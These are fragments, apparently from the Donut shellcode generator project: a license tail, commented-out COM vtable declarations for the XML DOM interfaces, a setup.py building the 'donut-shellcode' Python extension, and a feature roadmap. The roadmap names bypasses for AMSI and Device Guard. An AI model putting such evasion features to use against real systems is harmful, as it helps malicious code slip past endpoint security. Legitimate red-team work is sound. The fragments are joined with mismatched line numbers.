5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | /** | |
32 | typedef struct IXMLDOMNodeVtbl { | |
33 | BEGIN_INTERFACE | |
34 | ||
35 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
36 | IXMLDOMNode * This, | |
37 | REFIID riid, | |
38 | void **ppvObject); | |
39 | ||
40 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
41 | IXMLDOMNode * This); | |
42 | ||
43 | ULONG ( STDMETHODCALLTYPE *Release )( | |
44 | IXMLDOMNode * This); | |
45 | ||
46 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( | |
47 | IXMLDOMNode * This, | |
48 | UINT *pctinfo); | |
49 | ||
50 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( | |
51 | IXMLDOMNode * This, | |
52 | UINT iTInfo, | |
53 | LCID lcid, | |
54 | ITypeInfo **ppTInfo); | |
55 | ||
56 | HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( | |
57 | IXMLDOMNode * This, | |
58 | REFIID riid, | |
59 | LPOLESTR *rgszNames, | |
60 | UINT cNames, | |
61 | LCID lcid, | |
62 | DISPID *rgDispId); | |
63 | ||
64 | HRESULT ( STDMETHODCALLTYPE *Invoke )( | |
65 | IXMLDOMNode * This, | |
66 | DISPID dispIdMember, | |
67 | REFIID riid, | |
68 | LCID lcid, | |
69 | WORD wFlags, | |
70 | DISPPARAMS *pDispParams, | |
71 | VARIANT *pVarResult, | |
72 | EXCEPINFO *pExcepInfo, | |
73 | UINT *puArgErr); | |
74 | ||
75 | HRESULT ( STDMETHODCALLTYPE *get_nodeName )( | |
76 | IXMLDOMNode * This, | |
77 | BSTR *name); | |
78 | ||
79 | HRESULT ( STDMETHODCALLTYPE *get_nodeValue )( | |
80 | IXMLDOMNode * This, | |
81 | VARIANT *value); | |
82 | ||
83 | HRESULT ( STDMETHODCALLTYPE *put_nodeValue )( | |
84 | IXMLDOMNode * This, | |
85 | VARIANT value); | |
86 | ||
87 | HRESULT ( STDMETHODCALLTYPE *get_nodeType )( | |
88 | IXMLDOMNode * This, | |
89 | DOMNodeType *type); | |
90 | ||
91 | HRESULT ( STDMETHODCALLTYPE *get_parentNode )( | |
92 | IXMLDOMNode * This, | |
93 | IXMLDOMNode **parent); | |
94 | ||
95 | HRESULT ( STDMETHODCALLTYPE *get_childNodes )( | |
96 | IXMLDOMNode * This, | |
97 | IXMLDOMNodeList **childList); | |
98 | ||
99 | HRESULT ( STDMETHODCALLTYPE *get_firstChild )( | |
100 | IXMLDOMNode * This, | |
101 | IXMLDOMNode **firstChild); | |
102 | ||
103 | HRESULT ( STDMETHODCALLTYPE *get_lastChild )( | |
104 | IXMLDOMNode * This, | |
105 | IXMLDOMNode **lastChild); | |
106 | ||
107 | HRESULT ( STDMETHODCALLTYPE *get_previousSibling )( | |
108 | IXMLDOMNode * This, | |
109 | IXMLDOMNode **previousSibling); | |
110 | ||
111 | HRESULT ( STDMETHODCALLTYPE *get_nextSibling )( | |
112 | IXMLDOMNode * This, | |
113 | IXMLDOMNode **nextSibling); | |
114 | ||
115 | HRESULT ( STDMETHODCALLTYPE *get_attributes )( | |
116 | IXMLDOMNode * This, | |
117 | IXMLDOMNamedNodeMap **attributeMap); | |
118 | ||
119 | HRESULT ( STDMETHODCALLTYPE *insertBefore )( | |
120 | IXMLDOMNode * This, | |
121 | IXMLDOMNode *newChild, | |
122 | VARIANT refChild, | |
123 | IXMLDOMNode **outNewChild); | |
124 | ||
125 | HRESULT ( STDMETHODCALLTYPE *replaceChild )( | |
126 | IXMLDOMNode * This, | |
127 | IXMLDOMNode *newChild, | |
128 | IXMLDOMNode *oldChild, | |
129 | IXMLDOMNode **outOldChild); | |
130 | ||
131 | HRESULT ( STDMETHODCALLTYPE *removeChild )( | |
132 | IXMLDOMNode * This, | |
133 | IXMLDOMNode *childNode, | |
134 | IXMLDOMNode **oldChild); | |
135 | ||
136 | HRESULT ( STDMETHODCALLTYPE *appendChild )( | |
137 | IXMLDOMNode * This, | |
138 | IXMLDOMNode *newChild, | |
139 | IXMLDOMNode **outNewChild); | |
140 | ||
141 | HRESULT ( STDMETHODCALLTYPE *hasChildNodes )( | |
142 | IXMLDOMNode * This, | |
143 | VARIANT_BOOL *hasChild); | |
144 | ||
145 | HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )( | |
146 | IXMLDOMNode * This, | |
147 | IXMLDOMDocument **XMLDOMDocument); | |
148 | ||
149 | HRESULT ( STDMETHODCALLTYPE *cloneNode )( | |
150 | IXMLDOMNode * This, | |
151 | VARIANT_BOOL deep, | |
152 | IXMLDOMNode **cloneRoot); | |
153 | ||
154 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )( | |
155 | IXMLDOMNode * This, | |
156 | BSTR *nodeType); | |
157 | ||
158 | HRESULT ( STDMETHODCALLTYPE *get_text )( | |
159 | IXMLDOMNode * This, | |
160 | BSTR *text); | |
161 | ||
162 | HRESULT ( STDMETHODCALLTYPE *put_text )( | |
163 | IXMLDOMNode * This, | |
164 | BSTR text); | |
165 | ||
166 | HRESULT ( STDMETHODCALLTYPE *get_specified )( | |
167 | IXMLDOMNode * This, | |
168 | VARIANT_BOOL *isSpecified); | |
169 | ||
170 | HRESULT ( STDMETHODCALLTYPE *get_definition )( | |
171 | IXMLDOMNode * This, | |
172 | IXMLDOMNode **definitionNode); | |
173 | ||
174 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )( | |
175 | IXMLDOMNode * This, | |
176 | VARIANT *typedValue); | |
177 | ||
178 | HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )( | |
179 | IXMLDOMNode * This, | |
180 | VARIANT typedValue); | |
181 | ||
182 | HRESULT ( STDMETHODCALLTYPE *get_dataType )( | |
183 | IXMLDOMNode * This, | |
184 | VARIANT *dataTypeName); | |
185 | ||
186 | HRESULT ( STDMETHODCALLTYPE *put_dataType )( | |
187 | IXMLDOMNode * This, | |
188 | BSTR dataTypeName); | |
189 | ||
190 | HRESULT ( STDMETHODCALLTYPE *get_xml )( | |
191 | IXMLDOMNode * This, | |
192 | BSTR *xmlString); | |
193 | ||
194 | HRESULT ( STDMETHODCALLTYPE *transformNode )( | |
195 | IXMLDOMNode * This, | |
196 | IXMLDOMNode *stylesheet, | |
197 | BSTR *xmlString); | |
198 | ||
199 | HRESULT ( STDMETHODCALLTYPE *selectNodes )( | |
200 | IXMLDOMNode * This, | |
201 | BSTR queryString, | |
202 | IXMLDOMNodeList **resultList); | |
203 | ||
204 | HRESULT ( STDMETHODCALLTYPE *selectSingleNode )( | |
205 | IXMLDOMNode * This, | |
206 | BSTR queryString, | |
207 | IXMLDOMNode **resultNode); | |
208 | ||
209 | HRESULT ( STDMETHODCALLTYPE *get_parsed )( | |
210 | IXMLDOMNode * This, | |
211 | VARIANT_BOOL *isParsed); | |
212 | ||
213 | HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )( | |
214 | IXMLDOMNode * This, | |
215 | BSTR *namespaceURI); | |
216 | ||
217 | HRESULT ( STDMETHODCALLTYPE *get_prefix )( | |
218 | IXMLDOMNode * This, | |
219 | BSTR *prefixString); | |
220 | ||
221 | HRESULT ( STDMETHODCALLTYPE *get_baseName )( | |
222 | IXMLDOMNode * This, | |
223 | BSTR *nameString); | |
224 | ||
225 | HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )( | |
226 | IXMLDOMNode * This, | |
227 | IXMLDOMNode *stylesheet, | |
228 | VARIANT outputObject); | |
229 | ||
230 | END_INTERFACE | |
231 | } IXMLDOMNodeVtbl; | |
232 | ||
233 | typedef struct _IXMLDOMNode { | |
234 | IXMLDOMNodeVtbl *lpVtbl; | |
235 | } XMLDOMNode; | |
236 | ||
237 | typedef struct IXMLDOMDocumentVtbl { | |
238 | BEGIN_INTERFACE | |
239 | ||
240 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
241 | IXMLDOMDocument * This, | |
242 | REFIID riid, | |
243 | ||
244 | __RPC__deref_out void **ppvObject); | |
245 | ||
246 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
247 | IXMLDOMDocument * This); | |
248 | ||
249 | ULONG ( STDMETHODCALLTYPE *Release )( | |
250 | IXMLDOMDocument * This); | |
251 | ||
252 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( | |
253 | IXMLDOMDocument * This, | |
254 | UINT *pctinfo); | |
255 | ||
256 | HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( | |
257 | IXMLDOMDocument * This, | |
258 | UINT iTInfo, | |
259 | LCID lcid, | |
260 | ITypeInfo **ppTInfo); | |
261 | ||
262 | HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( | |
263 | IXMLDOMDocument * This, | |
264 | REFIID riid, | |
265 | LPOLESTR *rgszNames, | |
266 | UINT cNames, | |
267 | LCID lcid, | |
268 | DISPID *rgDispId); | |
269 | ||
270 | HRESULT ( STDMETHODCALLTYPE *Invoke )( | |
271 | IXMLDOMDocument * This, | |
272 | DISPID dispIdMember, | |
273 | REFIID riid, | |
274 | LCID lcid, | |
275 | WORD wFlags, | |
276 | DISPPARAMS *pDispParams, | |
277 | VARIANT *pVarResult, | |
278 | EXCEPINFO *pExcepInfo, | |
279 | UINT *puArgErr); | |
280 | ||
281 | HRESULT ( STDMETHODCALLTYPE *get_nodeName )( | |
282 | IXMLDOMDocument * This, | |
283 | BSTR *name); | |
284 | ||
285 | HRESULT ( STDMETHODCALLTYPE *get_nodeValue )( | |
286 | IXMLDOMDocument * This, | |
287 | VARIANT *value); | |
288 | ||
289 | HRESULT ( STDMETHODCALLTYPE *put_nodeValue )( | |
290 | IXMLDOMDocument * This, | |
291 | VARIANT value); | |
292 | ||
293 | HRESULT ( STDMETHODCALLTYPE *get_nodeType )( | |
294 | IXMLDOMDocument * This, | |
295 | DOMNodeType *type); | |
296 | ||
297 | HRESULT ( STDMETHODCALLTYPE *get_parentNode )( | |
298 | IXMLDOMDocument * This, | |
299 | IXMLDOMNode **parent); | |
300 | ||
301 | HRESULT ( STDMETHODCALLTYPE *get_childNodes )( | |
302 | IXMLDOMDocument * This, | |
303 | IXMLDOMNodeList **childList); | |
304 | ||
305 | HRESULT ( STDMETHODCALLTYPE *get_firstChild )( | |
306 | IXMLDOMDocument * This, | |
307 | IXMLDOMNode **firstChild); | |
308 | ||
309 | HRESULT ( STDMETHODCALLTYPE *get_lastChild )( | |
310 | IXMLDOMDocument * This, | |
311 | IXMLDOMNode **lastChild); | |
312 | ||
313 | HRESULT ( STDMETHODCALLTYPE *get_previousSibling )( | |
314 | IXMLDOMDocument * This, | |
315 | IXMLDOMNode **previousSibling); | |
316 | ||
317 | HRESULT ( STDMETHODCALLTYPE *get_nextSibling )( | |
318 | IXMLDOMDocument * This, | |
319 | IXMLDOMNode **nextSibling); | |
320 | ||
321 | HRESULT ( STDMETHODCALLTYPE *get_attributes )( | |
322 | IXMLDOMDocument * This, | |
323 | IXMLDOMNamedNodeMap **attributeMap); | |
324 | ||
325 | HRESULT ( STDMETHODCALLTYPE *insertBefore )( | |
326 | IXMLDOMDocument * This, | |
327 | IXMLDOMNode *newChild, | |
328 | VARIANT refChild, | |
329 | IXMLDOMNode **outNewChild); | |
330 | ||
331 | HRESULT ( STDMETHODCALLTYPE *replaceChild )( | |
332 | IXMLDOMDocument * This, | |
333 | IXMLDOMNode *newChild, | |
334 | IXMLDOMNode *oldChild, | |
335 | IXMLDOMNode **outOldChild); | |
336 | ||
337 | HRESULT ( STDMETHODCALLTYPE *removeChild )( | |
338 | IXMLDOMDocument * This, | |
339 | IXMLDOMNode *childNode, | |
340 | IXMLDOMNode **oldChild); | |
341 | ||
342 | HRESULT ( STDMETHODCALLTYPE *appendChild )( | |
343 | IXMLDOMDocument * This, | |
344 | IXMLDOMNode *newChild, | |
345 | IXMLDOMNode **outNewChild); | |
346 | ||
347 | HRESULT ( STDMETHODCALLTYPE *hasChildNodes )( | |
348 | IXMLDOMDocument * This, | |
349 | VARIANT_BOOL *hasChild); | |
350 | ||
351 | HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )( | |
352 | IXMLDOMDocument * This, | |
353 | IXMLDOMDocument **XMLDOMDocument); | |
354 | ||
355 | HRESULT ( STDMETHODCALLTYPE *cloneNode )( | |
356 | IXMLDOMDocument * This, | |
357 | VARIANT_BOOL deep, | |
358 | IXMLDOMNode **cloneRoot); | |
359 | ||
360 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )( | |
361 | IXMLDOMDocument * This, | |
362 | BSTR *nodeType); | |
363 | ||
364 | HRESULT ( STDMETHODCALLTYPE *get_text )( | |
365 | IXMLDOMDocument * This, | |
366 | BSTR *text); | |
367 | ||
368 | HRESULT ( STDMETHODCALLTYPE *put_text )( | |
369 | IXMLDOMDocument * This, | |
370 | BSTR text); | |
371 | ||
372 | HRESULT ( STDMETHODCALLTYPE *get_specified )( | |
373 | IXMLDOMDocument * This, | |
374 | VARIANT_BOOL *isSpecified); | |
375 | ||
376 | HRESULT ( STDMETHODCALLTYPE *get_definition )( | |
377 | IXMLDOMDocument * This, | |
378 | IXMLDOMNode **definitionNode); | |
379 | ||
380 | HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )( | |
381 | IXMLDOMDocument * This, | |
382 | VARIANT *typedValue); | |
383 | ||
384 | HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )( | |
385 | IXMLDOMDocument * This, | |
386 | VARIANT typedValue); | |
387 | ||
388 | HRESULT ( STDMETHODCALLTYPE *get_dataType )( | |
389 | IXMLDOMDocument * This, | |
390 | VARIANT *dataTypeName); | |
391 | ||
392 | HRESULT ( STDMETHODCALLTYPE *put_dataType )( | |
393 | IXMLDOMDocument * This, | |
394 | BSTR dataTypeName); | |
395 | ||
396 | HRESULT ( STDMETHODCALLTYPE *get_xml )( | |
397 | IXMLDOMDocument * This, | |
398 | BSTR *xmlString); | |
399 | ||
400 | HRESULT ( STDMETHODCALLTYPE *transformNode )( | |
401 | IXMLDOMDocument * This, | |
402 | IXMLDOMNode *stylesheet, | |
403 | BSTR *xmlString); | |
404 | ||
405 | HRESULT ( STDMETHODCALLTYPE *selectNodes )( | |
406 | IXMLDOMDocument * This, | |
407 | BSTR queryString, | |
408 | IXMLDOMNodeList **resultList); | |
409 | ||
410 | HRESULT ( STDMETHODCALLTYPE *selectSingleNode )( | |
411 | IXMLDOMDocument * This, | |
412 | BSTR queryString, | |
413 | IXMLDOMNode **resultNode); | |
414 | ||
415 | HRESULT ( STDMETHODCALLTYPE *get_parsed )( | |
416 | IXMLDOMDocument * This, | |
417 | VARIANT_BOOL *isParsed); | |
418 | ||
419 | HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )( | |
420 | IXMLDOMDocument * This, | |
421 | BSTR *namespaceURI); | |
422 | ||
423 | HRESULT ( STDMETHODCALLTYPE *get_prefix )( | |
424 | IXMLDOMDocument * This, | |
425 | BSTR *prefixString); | |
426 | ||
427 | HRESULT ( STDMETHODCALLTYPE *get_baseName )( | |
428 | IXMLDOMDocument * This, | |
429 | BSTR *nameString); | |
430 | ||
431 | HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )( | |
432 | IXMLDOMDocument * This, | |
433 | IXMLDOMNode *stylesheet, | |
434 | VARIANT outputObject); | |
435 | ||
436 | HRESULT ( STDMETHODCALLTYPE *get_doctype )( | |
437 | IXMLDOMDocument * This, | |
438 | IXMLDOMDocumentType **documentType); | |
439 | ||
440 | HRESULT ( STDMETHODCALLTYPE *get_implementation )( | |
441 | IXMLDOMDocument * This, | |
442 | IXMLDOMImplementation **impl); | |
443 | ||
444 | HRESULT ( STDMETHODCALLTYPE *get_documentElement )( | |
445 | IXMLDOMDocument * This, | |
446 | IXMLDOMElement **DOMElement); | |
447 | ||
448 | HRESULT ( STDMETHODCALLTYPE *putref_documentElement )( | |
449 | IXMLDOMDocument * This, | |
450 | IXMLDOMElement *DOMElement); | |
451 | ||
452 | HRESULT ( STDMETHODCALLTYPE *createElement )( | |
453 | IXMLDOMDocument * This, | |
454 | BSTR tagName, | |
455 | IXMLDOMElement **element); | |
456 | ||
457 | HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )( | |
458 | IXMLDOMDocument * This, | |
459 | IXMLDOMDocumentFragment **docFrag); | |
460 | ||
461 | HRESULT ( STDMETHODCALLTYPE *createTextNode )( | |
462 | IXMLDOMDocument * This, | |
463 | BSTR data, | |
464 | IXMLDOMText **text); | |
465 | ||
466 | HRESULT ( STDMETHODCALLTYPE *createComment )( | |
467 | IXMLDOMDocument * This, | |
468 | BSTR data, | |
469 | IXMLDOMComment **comment); | |
470 | ||
471 | HRESULT ( STDMETHODCALLTYPE *createCDATASection )( | |
472 | IXMLDOMDocument * This, | |
473 | BSTR data, | |
474 | IXMLDOMCDATASection **cdata); | |
475 | ||
476 | HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )( | |
477 | IXMLDOMDocument * This, | |
478 | BSTR target, | |
479 | BSTR data, | |
480 | IXMLDOMProcessingInstruction **pi); | |
481 | ||
482 | HRESULT ( STDMETHODCALLTYPE *createAttribute )( | |
483 | IXMLDOMDocument * This, | |
484 | BSTR name, | |
485 | IXMLDOMAttribute **attribute); | |
486 | ||
487 | HRESULT ( STDMETHODCALLTYPE *createEntityReference )( | |
488 | IXMLDOMDocument * This, | |
489 | BSTR name, | |
490 | IXMLDOMEntityReference **entityRef); | |
491 | ||
492 | HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )( | |
493 | IXMLDOMDocument * This, | |
494 | BSTR tagName, | |
495 | IXMLDOMNodeList **resultList); | |
496 | ||
497 | HRESULT ( STDMETHODCALLTYPE *createNode )( | |
498 | IXMLDOMDocument * This, | |
499 | VARIANT Type, | |
500 | BSTR name, | |
501 | BSTR namespaceURI, | |
502 | IXMLDOMNode **node); | |
503 | ||
504 | HRESULT ( STDMETHODCALLTYPE *nodeFromID )( | |
505 | IXMLDOMDocument * This, | |
506 | BSTR idString, | |
507 | IXMLDOMNode **node); | |
508 | ||
509 | HRESULT ( STDMETHODCALLTYPE *load )( | |
510 | IXMLDOMDocument * This, | |
511 | VARIANT xmlSource, | |
512 | VARIANT_BOOL *isSuccessful); | |
513 | ||
514 | HRESULT ( STDMETHODCALLTYPE *get_readyState )( | |
515 | IXMLDOMDocument * This, | |
516 | long *value); | |
517 | ||
518 | HRESULT ( STDMETHODCALLTYPE *get_parseError )( | |
519 | IXMLDOMDocument * This, | |
520 | IXMLDOMParseError **errorObj); | |
521 | ||
522 | HRESULT ( STDMETHODCALLTYPE *get_url )( | |
523 | IXMLDOMDocument * This, | |
524 | BSTR *urlString); | |
525 | ||
526 | HRESULT ( STDMETHODCALLTYPE *get_async )( | |
527 | IXMLDOMDocument * This, | |
528 | VARIANT_BOOL *isAsync); | |
529 | ||
530 | HRESULT ( STDMETHODCALLTYPE *put_async )( | |
531 | IXMLDOMDocument * This, | |
532 | VARIANT_BOOL isAsync); | |
533 | ||
534 | HRESULT ( STDMETHODCALLTYPE *abort )( | |
535 | IXMLDOMDocument * This); | |
536 | ||
537 | HRESULT ( STDMETHODCALLTYPE *loadXML )( | |
538 | IXMLDOMDocument * This, | |
539 | BSTR bstrXML, | |
540 | VARIANT_BOOL *isSuccessful); | |
541 | ||
542 | HRESULT ( STDMETHODCALLTYPE *save )( | |
543 | IXMLDOMDocument * This, | |
544 | VARIANT destination); | |
545 | ||
546 | HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )( | |
547 | IXMLDOMDocument * This, | |
548 | VARIANT_BOOL *isValidating); | |
549 | ||
550 | HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )( | |
551 | IXMLDOMDocument * This, | |
552 | VARIANT_BOOL isValidating); | |
553 | ||
554 | HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )( | |
555 | IXMLDOMDocument * This, | |
556 | VARIANT_BOOL *isResolving); | |
557 | ||
558 | HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )( | |
559 | IXMLDOMDocument * This, | |
560 | VARIANT_BOOL isResolving); | |
561 | ||
562 | HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )( | |
563 | IXMLDOMDocument * This, | |
564 | VARIANT_BOOL *isPreserving); | |
565 | ||
566 | HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )( | |
567 | IXMLDOMDocument * This, | |
568 | VARIANT_BOOL isPreserving); | |
569 | ||
570 | HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )( | |
571 | IXMLDOMDocument * This, | |
572 | VARIANT readystatechangeSink); | |
573 | ||
574 | HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )( | |
575 | IXMLDOMDocument * This, | |
576 | VARIANT ondataavailableSink); | |
577 | ||
578 | HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )( | |
579 | IXMLDOMDocument * This, | |
580 | VARIANT ontransformnodeSink); | |
581 | ||
582 | END_INTERFACE | |
583 | } IXMLDOMDocumentVtbl; | |
584 | ||
585 | typedef struct _IXMLDOMDocument { | |
586 | IXMLDOMDocumentVtbl *lpVtbl; | |
587 | } XMLDomDocument;*/⏎ |
import os

from setuptools import Extension, setup
1 | ||
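# Read the long description from the README that sits next to this file rather
# than from the current working directory, so the build still works when the
# front-end invokes setup.py from elsewhere. The explicit encoding avoids a
# locale-dependent UnicodeDecodeError on platforms whose default codec is not
# UTF-8 (a cp1252 Windows console is the typical failure case for this project).
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "README.md"), "r", encoding="utf-8") as fh:
    long_description = fh.read()

# The donut generator built as a CPython extension: the core library sources
# plus the Python binding in donutmodule.c. Paths are relative, as in the
# original; they are resolved against the directory the build runs in.
module = Extension(
    "donut",
    include_dirs=[
        'include'
    ],
    sources=[
        'donut.c',
        'hash.c',
        'encrypt.c',
        'payload/clib.c',
        'donutmodule.c'
    ]
)

setup(
    name='donut-shellcode',
    version='0.9.2',
    description='Donut Python C extension',
    long_description=long_description,
    long_description_content_type="text/markdown",
    url='https://github.com/TheWover/donut',
    author='TheWover, Odzhan, byt3bl33d3r',
    include_package_data=True,
    # NOTE(review): zip_safe=True is questionable for a distribution that ships
    # a compiled extension (shared objects cannot be imported from a zip);
    # confirm this is intended or set it to False.
    zip_safe=True,
    ext_modules=[module],
    python_requires='>=3.0',
)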
0 | * v0.9.1: | |
* Dual-mode shellcode that can run in either x64 or x86 (WOW64) processes.
2 | * Automatic detection of the CLR version required for .NET Assembly payloads. | |
* AMSI bypass for .NET 4.8 that ensures all Assemblies can be safely loaded.
* Modular system for adding bypasses. Your choice of bypass functionality is compiled into payload.exe based on compiler flags.
5 | * Bypass for Device Guard policy preventing execution of dynamically generated .NET code | |
6 | * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings | |
7 | * v1.0: | |
8 | * C# generator | |
9 | * C# wrapper for our dynamic library | |
10 | * Python generator | |
11 | * Python wrapper for our dynamic library | |
12 | * Better documentation for debugging, designing with, and integrating Donut. | |
13 | * v1.1: | |
14 | * Automatic unloading of Application Domains after the Assembly finishes executing. | |
15 | * Support for HTTP proxies |